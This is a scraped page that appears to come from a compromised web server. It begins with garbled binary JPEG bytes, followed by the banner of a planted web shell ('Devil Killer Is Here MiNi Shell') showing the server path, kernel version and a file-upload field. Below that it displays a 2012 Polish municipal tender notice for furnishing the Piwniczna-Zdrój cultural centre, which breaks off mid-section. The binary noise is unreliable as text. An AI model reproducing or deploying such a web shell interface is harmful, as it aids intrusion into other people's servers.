JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121121/462226-N-2012.html

<p class="kh_header"><b>Piwniczna-Zdrój: Dostawa wraz z montażem wyposażenia do Domu Kultury    w Piwnicznej-Zdroju</b><br>
<b>Numer ogłoszenia: 462226 - 2012; data zamieszczenia: 21.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Piwniczna-Zdrój , ul. Rynek 20, 33-350 Piwniczna-Zdrój, woj. małopolskie, tel. 0-18 4464043, faks 0-18 4464186.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piwniczna.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem wyposażenia do Domu Kultury    w Piwnicznej-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.WYPOSAŻENIA BIBLIOTEKI W BUDYNKU MGOK W PIWNICZNEJ-ZDROJU.
1.1	SALONIK  PRASOWY

Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w  wykazie	Wymiary(cm)	Ilość (szt)
1.1	fotel	fotel obrotowy czarny  z regulowaną wysokością  obicie tapicerowane, kółka	66x68x72	4
1.2	stolik 	stolik okrągły z dwoma blatami ,na kółkach,wykonany z stali, powłoka niklowa , bezbarwny lakier,poliuretanowy, cynk, szkło hartowane, szkliwo, biały  	o50x62	2

1.2	BIBLIOTEKA I CZYTELNIA
Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie	Wymiary(cm)	Ilość (szt)
1.3	stół	słół okrągły biały Blat: Płyta pilśniowa, Farba akrylowaNoga: tworzywo poliamidowe zbrojonePłyta górna Noga wewnętrzna: stal, Barwiona szpachla epoksydowo/poliestrowa w proszku 	105x75	2
1.4	krzesło obrotowe	tworzywo poliamidowe,barwiona szpachla epoksydowo poliestrowa w proszku,stal, tworzywo polipropylenowe	szerokość całkowita 54 cm, szerokość oparcia 47 cmwysokośc siedzenia 45 cmwysokość całkowita 84 cm	16
1.5	biurko	Części główne/ Szyna: stal, Barwiona szpachla epoksydowo poliestrowa w proszkuPanel górny: tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu), Płyta wiórowa, folia melaminowa, folia melaminowa	139x72x74	6
1.6	Lada recepcyjna	np. system VALDE (LVP10+LVP13+LVL13+LVL10) kolor biały pastel, front zielony poler	78x322x110	1

REGAŁY PÓŁKOWE LEKKIEJ KONSTRUKCJI METALOWEJ

Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie	Wymiary(cm)	Ilość (szt)
1.7	regał - 5 półek	stabilna konstrukcja nośność półki: 90 kg cztery przestawne półki metalowe,regał skręcany możliwość złożenia regału w poziomie malowanie proszkowe, kolor grafit	95x40x170	43
1.8	regał - 4 półki	stabilna konstrukcja,nośność półki: 90 kg ,pięć przestawnych półek metalowych,sposób montażu: regał skręcany,możliwość złożenia regału w poziomie,malowanie proszkowe, grafit	95x40x180	95
Powyższe wyposażenie należy dostarczyć i  zamontować zgodnie z załączonemy projektem wyposażenia 
2. ZESTAWIENIE WYPOSAŻENIA W BUDYNKU SALI WIELOFUNKCYJNEJ MGOK W PIWNICZNEJ- ZDROJU
2.1	SZATNIA
Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie model	Wymiary(cm)	Ilość (szt)
2.1.1	lada	np. LADA L3	150x70x110	3
2.1.2	Listwa ścienna  z wieszakami	np. Typ NSA	dł. 190	2
2.2	SALA WIELOFUNKCYJNA
Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie model	Wymiary(cm)	Ilość (szt)
2.2.1	Krzesło konferencyjne krzesło konferencyjne na czterech nogach obicie tapicerowane Stelaż wykonany z rury kształtowej o bardzo dużej wytrzymałości na odkształcenia. Stelaż chromowany lub malowany proszkowo. kolor grafitowyszerokość całkowita 54 cm, szerokość oparcia 47 cmwysokośc siedzenia 45 cmwysokość całkowita 84 cm 	111
2.2.2	Scena ze stopniami	scena- podest na konstrukcji stalowej wykończony drewnem. Profile stalowe zamknięte 3x3cm malowane.  Wykończenie podestu, frontu i stopni  deską podłogową klejoną na płycie OSB. lub stopki wykonane z aluminium	870x400(34 m2)Światło pod sceną min. 60cm.	1
2.2.3	Szafka na wzmacniacz i zwrotnicę		Stojąca szafa do profesjonalnej zabudowy urządzeń teleinformatycznych skonstruowanych w oparciu o system 19 oraz urządzeń Audio Video. systemu wyposażenia biura lub domu.Zestaw zawiera:obudowa 19  cokół na kółkach i stopkach poziomujących -.uchwyty ,akcesoria do montażu  np. Stojąca szafa MEDIArack19-FL	150x70x110	1
2.2.4	Blat pod mikser		np. VIKA BYSKE	70x200x85	1
2.2.5	Podstawa		np. VIKA  MOLIDEN	62x10x70	2
2.3	GARDEROBA
Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie model model	Wymiary(cm)	Ilość (szt)
2.3.1	Szafka ubraniowa stalowa dwudzielna		60x49x180	1
2.3.2	Krzesło konferencyjne	krzesło konferencyjne na czterech nogach obicie tapicerowane Stelaż wykonany z rury kształtowej o bardzo dużej wytrzymałości na odkształcenia. Stelaż chromowany lub malowany proszkowo. kolor grafitowy	szerokość całkowita 54 cm, szerokość oparcia 47 cmwysokośc siedzenia 45 cmwysokość całkowita 84 cm	2
2.3.3	Biurko	Otwór na kable z tyłu; - Starannie wykończona również część tylna; nadaje się do ustawienia na środku pokoju.- Regulowana wysokość nóg  Blat: Płyta pilśniowa, Płyta wiórowa, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu), foliaPanel tylny: Płyta pilśniowa, folia, Płyta wiórowa, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu)Szyna spodnia: Płyta wiórowa, folia, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu)Półka: Płyta pilśniowa, foliaPanel boczny: Płyta wiórowa, Płyta pilśniowa, folia, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu) kolor biały	60x120x74	1
2.3.4	Lustro ścienne	owal	60x60	1
2.3.5	Wieszak na ubrania	Maksymalne obciążenie: 30 kg stal barwiona szpachla epoksydowa w proszku	60X118	1
2.4	GARDEROBA	
	Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie model	Wymiary(cm)	Ilość (szt)
2.4.1	Szafka ubraniowa stalowa dwudzielna	popielaty	60x49x180	2
2.4.2	Krzesło konferencyjne	krzesło konferencyjne na czterech nogach obicie tapicerowane Stelaż wykonany z rury kształtowej o bardzo dużej wytrzymałości na odkształcenia. Stelaż chromowany lub malowany proszkowo. kolor grafitowy	szerokość całkowita 54 cm, szerokość oparcia 47 cmwysokośc siedzenia 45 cmwysokość całkowita 84 cm	4
2.4.3	Biurko	- Otwór na kable z tyłu; - Starannie wykończona również część tylna; nadaje się do ustawienia na środku pokoju.- Regulowana wysokość nóg  Blat: Płyta pilśniowa, Płyta wiórowa, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu), foliaPanel tylny: Płyta pilśniowa, folia, Płyta wiórowa, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu)Szyna spodnia: Płyta wiórowa, folia, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu)Półka: Płyta pilśniowa, foliaPanel boczny: Płyta wiórowa, Płyta pilśniowa, folia, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu) kolor biały 	60x120x74	4
2.4.4	Lustro ścienne	owal	60x60	4
2.4.5	Wieszak na ubrania	Maksymalne obciążenie: 30 kg stal barwiona szpachla epoksydowa w proszku	60x118	3	
Powyższe wyposażenie należy dostarczyć i  zamontować zgodnie z załączonym  projektem wyposażenia
3. WYPOSAŻENIE BIURA  ORAZ SAL DO ĆWICZEŃ
	Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie model model	Wymiary(cm)	Ilość (szt)
3.1	biurka	Otwór na kable z tyłu; - Starannie wykończona również część tylna; nadaje się do ustawienia na środku pokoju.- Regulowana wysokość nóg  Blat: Płyta pilśniowa, Płyta wiórowa, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu), foliaPanel tylny: Płyta pilśniowa, folia, Płyta wiórowa, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu)Szyna spodnia: Płyta wiórowa, folia, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu)Półka: Płyta pilśniowa, foliaPanel boczny: Płyta wiórowa, Płyta pilśniowa, folia, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu) kolor  orzech lub calvados, olcha	60x120x74	4
3.2	krzesło biurowe  obrotowe	obicie tapicerowane, obrotowe, kółka- kolor czarny	wysokość siedziska  około 45-57 cmszerokość siedziska około  54 cm, głębokośc siedziska  około 48 cmwysokość oparcia około  59 cm, średnica podstawy ok. 69	4
3.3	stół składany prostokątny 	Wykonanie: baza metalowa malowana proszkowo, z mechanizmem składania nóg w celu optymalnego magazynowania, Stół posiada stelaż ramowy, dzięki czemu jego konstrukcja jest wzmocniona  Blat wykonany z płyty meblowej o gr. 18 mm,  kolor , buk  	180x80x75	10
3.4	Stół składany kwadratowy	Wykonanie: baza metalowa malowana proszkowo, z mechanizmem składania nóg w celu optymalnego magazynowania, Stół posiada stelaż ramowy, dzięki czemu jego konstrukcja jest wzmocniona  Blat wykonany z płyty meblowej o gr. 18 mm,  kolor , buk 	80x80x75	15
3.5	wieszak stojący	podstawa marmurowa, drewno, chrom	37x176x37	4
3,6	szafa aktowa	wieńce górne i szaf i regałów wykonane z płyty melaminowej, orzech, półki mocowane za pomocą złaczy zabezpieczających przed wysunięciem, zamek patentowy z kombinacją	183x80x38	4
3.7	Krzesło obrotowe	Oparcie i siedzisko krzesła wykonane z trwałej sklejki bukowej, wyposażone w stalową wytrzymałą podstawę oraz antypoślizgowy podnóżek posiadające regulowaną wysokość	Wysokość 92,5 - 118,5Wys. Siedziska ; 55,5 -81,5Wys.oparcia: 37Głębokość i szer. Siedziska - 40	4
3.8	Kontenr mobilny	Posiada 3 szuflady na centralny zamek, na kółkach, kolor - orzech 	60x54x43	3
3.9	Szafy biurowe	Z płyty melaminowej, orzech, drzwiczki z zamkiem, 5 obszernych półek	183x80x38	5
3.10	Wieszak jednostronny  np.ŁSZ 1	Ławko wieszak wyk. Z elementów metalowych i drewnianych	1650x1500x380	8
3.11	Krzesła składane	Siedzenie z polietylenu, wytrzymałe, stalowa rama, powłoka węglanowa	Rozłóż.46x88x45Złożone 45x114x6,5Siedzisko 42x40Waga 5 kg	40
3.12	Zestaw mebli biurowych 	-Biurko gabinetowe. Struktura wykończona fornirowanym drewnem w odcieniu wiśniowego brązu , - boczna komoda z blatem i przegrodami, - kontener pod blat z szufladami	 180x90x76100x50x7640x53x60	1
3.13	Fotel biurowy obrotowy	Ze skóry naturalnej ,szerokie siedzisko, profilowane oparcie na odcinku lędźwiowym	Wys. Siedz. 49-59 , wys.oparcia 67,gł.siedziska 52,szer.siedziska 53	1
3.14	Komplety luster do Sali prób ze wspornikami i drążkami	Lustra posturograficzne malowane ze wspornikami podwójnymi i drążkami do  ćwiczeń taneczno-baletowych	2x1	10
3.15	Magazyn strojów Zespołów regionalnych- garderoba Wyszczególnienie: Płyta meblowa oklejana okleiną PCV 1mm gr.Systemy jezdne do drzwi przesuwnych Laguna w kolorze srebrnymPółki ze wzmocnieniami Rączki do drzwi Multi OmegaProwadnice szuflad BLUM pełny wysuw 30 kg udźwig Dno szuflad płyta 18 mmKolor szafy: dąb jasny Kolor regałów: buk 	Półka 196 x 24  - 2szt. Regał 208 x 91 x 38  - 2 szt.  Drzwi przesuwne 202 x 198  Szafa przesuwna 280 c 560 x 70  	1 komplet
3.15	Ławo-stół	Płyta laminowana, szkło piaskowe, elementy ozdobne z tworzywa ABS , rozkładana 	110(150x60x55	1
3.16	Ścianki wystawowe Konstrukcja z profilów aluminiowych anodowanycho przekroju koła umożliwiających łączenie paneli pod kątem 90 lub 180 st. Co umożliwia zbudowanie ścianki z dowolnej liczby paneli, kolor srebrny mat - profil okrągły, wypełnienie ścianek - płyta PVC 4 mmm, podstawy stabilizujące - kręgi betonowe z osłoną z tworzywa	70x100	8
3.17	Ścianki ekspozycyjne	Wykonane z lekkiego prostego profila z podziałem poziomym. Rozkładane do formatu 1)2 panela, wykonane z prolili o cechach zawiasu	szerokośćA = 103xwys.B=200cm format wypełnienia 100x97 - 2 szt	10
3.18	pianino cyfrowe	pełni ważona klawiatura (88 klawiszy,RH3), 3 pozomy regulacji dynamiki, 30 brzmień ( próbka fortepianu koncertowego), polifonia 60 dzwięków, 30 utworów demo, efekty Reverb i Chorus, metronom, 3 pedały, 2 wejścia słuchawkowe, funkcja transpozycji, wbudowane nagłosnienie ( 2x11W), złącza MIDI		1
3.19	keyboard instrument klawiszowy	61 klawiszowa,reagująca na dotyk klawiatura z z min. 731 naturalnymi brzmieniami i funkcją Arpeggio automatycznie generująca frazy , oparte na akordach,pokretła służące do kontroli w czasie rzeczywistym, funkacja , pokrętła Pitch Bend, służace do kontroli wysokości dzwięku w czasie rzeczywistym, muzyczna baza danych min 305 utworów do szybkich ustawien keybordu, min 5 brzmień Sweet, min 3 brzmienia Cool, min 3 brzmienia Dynamic, min 206 naturalnych brzmień+ min 462 brzmień XG-Life+ min 15 Drum(SFX kits + min 40 Arpeggio, min 32 profili, podświetlony wyświetlacz LCD min 92 mm x min 42 mm, min 2 gałki dla filtrów i efektów, min dwudrożny system głośników min 2x min 2,5 Watt, wymiary  około 946x402x136 mm, waga 7kg kolor czarny, port usb to host i usb to device, instrukcja w języku polskim, zasilacz w zestawie 		1
3.20	Listwa do podwieszania obrazów	listwa wykonana  z profilu aluminiowego anodowanego na kolor srebrny. listwy mocowane do ściany za pomocą kołków rozporowych. Do listwy włożony detal np. SP2-41, mocujący linkę np. SP2-09, posiadający możliwość przesuwania wzdłuż długości profila. Do linki mocowany hak np. MZ-026 dopuszcaalen obciązemnie listwy około 40 kg/mb	  2 mb10
4. MUZEUM
Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie model model	Wymiary(cm)	Ilość (szt)
4.1	gabloty muzalne 	gabloty wykonane z profili aluminiowych  anodowanych z oszkloną częścią ekspozycyjną , wykonana z profili owalnych, kopuła w profilach- szkło hartowane, otwierana z boku lub od frontu - szyby suwane	100x70x70x30	4
4.2	witryny stojące na cokole	wykonane z profili aluminowych anodowanych, profile owalne, malowane proszkowo ( kolor do uzgodnienia z Zamawaijącym) , szkło hartowane, plecy gabloty także wypełnione ze szkła , zamek patentowy,  z uchytami na wieszaki 	100x50x100	2
4.3	witryny stojące na cokole	wykonane z profili aluminowych anodowanych, profile owalne, malowane proszkowo ( kolor do uzgodnienia z Zamawaijącym) , szkło hartowane, plecy gabloty także wypełnione ze szkła , zamek patentowy,  z półkami 190x120x100odległośc między półkami 90x80	1
4.4	witryny stojące na szafce	wykonane z profili aluminowych anodowanych, profile owalne, malowane proszkowo ( kolor do uzgodnienia z Zamawaijącym) , szkło hartowane, plecy gabloty także wypełnione ze szkła , zamek patentowy,  z półkami	230x70x70wysokości oszklonej gabloty 170, wysokość szafki 60 	1
4.5	systemy modułowe scienne	konstrukcja nośna wykonana z profili aluminiowych, płaszczyzny pionowe ścian obłożone płytą MDF o grubości min 8 mm, szara, surowa. Płaszczyzny ekspozycyjne gruntowane  pozwalające wykończenie powierzchni Ściany przy uzyciu wieli technik stosowanych przy wykończeniu wnętrz np. malowanie farbamiw zestawie elementy pozwalające na łaczenie ze sobą kolejnuch modułów. ściany wyposażone w stopki do wypoziomowania. System powinien posiadać  możliwośc rozbudowy ścian poprzez dołączanie kolejnych modułów ścon w linii prostej lub w układzie kątowym, gdzie kolejne Ściany dołączane są po kontem prostym. System powinien pozwalać na łatwy demontaż Ścian na pojedyńcze lekkie elementy w celu ich przenoszenia lub składowania. System powinien  posiadać moźliwośc zamocowania w gónej części listwy aluminiowej pozwalającej na zamocowanie przesuwanych względem listwy zawiesi.200 cmx240cmxok 50cm ( ścianki powinny tworzyć system mobilny)	12 
4.6	Listwa do podwieszania obrazów	listwa wykonana  z profilu aluminiowego anodowanego na kolor srebrny. listwy mocowane do ściany za pomocą kołków rozporowych. Do listwy włożony detal np. SP2-41, mocujący linkę np. SP2-09, posiadający możliwość przesuwania wzdłuż długości profila. Do linki mocowany hak np. MZ-026 dopuszcaalen obciązemnie listwy około 40 kg(mb	2,5 mb	15
5.Wszystkie oferowane materiały muszą być fabczycznie nowe, nieregenerowane, wolne od wad fizycznych  i prawnych, nie mają do nich praw osoby trzecie oraz nie jest przedmiotem żadnego postępowania  i zabezpieczenia.
6.W przypadku wskazania w opisie przedmiotu zamówienia , oraz  w załaczniku nr 1 do oferty , znaku towarowego, patentu lub pochodzenia służy jedynie do celów identyfikacyjnych, do określenia ich kompatybilności. Nazwy stanowią jedynie precyzyjne określenie klasy oraz parametrów technicznych produktów wymaganych przez Zamawiającego. w myśl art.29 ust.3 ustawy Prawo zamówień publicznych - zamawiający dopuszcza możłiwość składania ofert jakościowo równoważnych, spełniających równoważne parametry określone w opisie oraz  w załaczniku nr 1 do oferty.
Przez produkt równoważny Zamawiający rozumie produkt kompatybilny ze sprzętem, do którego jest zamówiony, o parametrach takich samych bądż lepszych w stosunku do oryginału produktu przez producenta urządzenia.
7.Materiały i wyroby winny być odpowiednio oznaczone i posiadać wszelkie dokumenty określone szczegółowymi przepisami dotyczącymi trybu dopuszczenia ich do stosowania jak: certyfikat na znak bezpieczeństwa, aktualną aprobatę techniczną, deklarację zgodności z Polską Normą, atest higieniczny, określenie klasyfikacji ogniowej , gwarancje itp.
8. Nazwy ( kody określone dla przedmiotu zamówienia we Wspólnym Słowniku Zamówień

Kod CPV 
39150000-8 Różne meble i wyposażenie
37310000-4 Instrumenty muzyczne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 37.31.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 4000,00 słownie: cztery tysiące  złotych 00(100
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)	w pieniądzu, przelewem na rachunek bankowy: 
 BS Piwniczna 62 8813 0004 2001 0000 7100 0001    z adnotacją  wadium - Dostawa wraz z montażem wyposażenia do Domu Kultury    w Piwnicznej-Zdroju  
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)	w gwarancjach bankowych, 
4)	w gwarancjach ubezpieczeniowych 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275)  w terminie 2012-11-28, sposób przekazania: orginał dołaczony do oferty
4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę realizacji co najmniej  1 zamówienia   w zakresie wyposażenia w meble wraz z montażem o łącznej wartości nie mniejszej niż 70 000,00 złotych brutto  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę -posiadanie środków finansowych lub zdolności kredytowej              w wysokosci nie mniejszej niż 70 000,00 zł oraz posiadanie ubezpieczenia od odpowiedzialnosci cywilnej               w zakresie prowadzonej działalności na kwotę nie mniejszą niż      70 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
